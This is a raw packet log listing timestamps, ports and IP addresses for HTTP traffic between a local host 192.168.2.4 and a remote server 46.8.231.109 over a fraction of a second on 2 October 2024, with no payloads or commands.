Oct 2, 2024 09:41:25.452773094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.452821016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.452821016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.545937061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.545984983 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546019077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546060085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546060085 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546061039 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546072006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546104908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546137094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546185970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546216011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546247959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546278954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546288013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546288013 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546298027 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546298027 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546309948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546309948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546343088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546375036 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546405077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546437025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546448946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546448946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546448946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546448946 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546473026 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546504021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546508074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546508074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546559095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546590090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546621084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546652079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546681881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546713114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546737909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546737909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546737909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546737909 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546744108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546778917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546809912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546840906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546871901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546902895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546920061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546920061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546920061 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546952009 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.546952963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546952963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546952963 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.546982050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547013044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547044039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547075033 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547106028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547116995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547116995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547116995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547116995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547137022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547183990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547214031 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547228098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547228098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547228098 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547249079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547278881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547311068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547341108 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547343969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547343969 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547372103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547419071 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547435999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547467947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547475100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547497988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547528982 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547559977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547561884 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547593117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547606945 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547624111 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547656059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547684908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547688007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547734976 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547763109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547766924 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547796011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547807932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547807932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547827959 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547858000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547858953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547858953 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547908068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547939062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547970057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.547988892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547988892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.547988892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548000097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548032045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548062086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548093081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548094034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548094034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548094034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548094034 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548122883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548126936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548155069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548186064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548218012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548228025 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548228979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548228979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548249960 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548281908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548330069 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548361063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548381090 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548381090 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548381090 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548381090 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548392057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548424006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548470020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548490047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548490047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548490047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548501968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548508883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548535109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548567057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548597097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548598051 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548631907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548661947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548671007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548671007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548671007 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548692942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548724890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548755884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548760891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548760891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548760891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548789024 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548820019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548851013 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548881054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548912048 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548943996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548974037 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.548983097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548983097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548983097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.548983097 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549005032 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549038887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549069881 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549099922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549129963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549135923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549135923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549135923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549135923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549160957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549192905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549222946 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549226999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549226999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549226999 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549253941 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549284935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549315929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549334049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549334049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549334049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549346924 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549377918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549408913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549434900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549434900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549434900 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549441099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549473047 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549504042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.549556971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549556971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549556971 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.549568892 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.634608030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634654045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634686947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634718895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634751081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634772062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.634772062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.634772062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.634773016 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.634872913 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634923935 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.634973049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635004044 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635051966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635083914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635114908 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635144949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635176897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635154009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635154009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635154009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635154009 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635226011 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635257006 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635291100 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635322094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635353088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635369062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635369062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635369062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635369062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635427952 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635461092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635492086 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635523081 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635560989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635560989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635560989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635560989 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635571003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635618925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635649920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635680914 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635726929 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635754108 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635754108 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635761023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635807991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635838985 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635873079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635881901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635881901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635881901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635881901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.635905981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635936975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635967970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.635998964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636030912 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636038065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636038065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636038065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636038065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636061907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636096001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636142969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636173964 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636204004 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636213064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636213064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636213064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636213064 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636234999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636265039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636296034 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636327028 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636332035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636332035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636332035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636332035 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636358023 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636389017 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636420012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636470079 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636499882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636529922 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636542082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636542082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636542082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636542082 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636560917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636593103 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636622906 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636655092 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636701107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636730909 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636760950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636794090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636804104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636804104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636804104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636804104 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.636823893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636871099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636902094 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636934042 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.636980057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637015104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637046099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637058020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637058020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637058020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637058020 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637075901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637079000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637108088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637137890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637168884 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637200117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637214899 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637234926 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637234926 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637234926 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637244940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637275934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637305975 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637310028 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637310982 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:25.637339115 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637368917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637401104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:25.637430906 CEST	80	49749	46.8.231.109	192.168.2.4
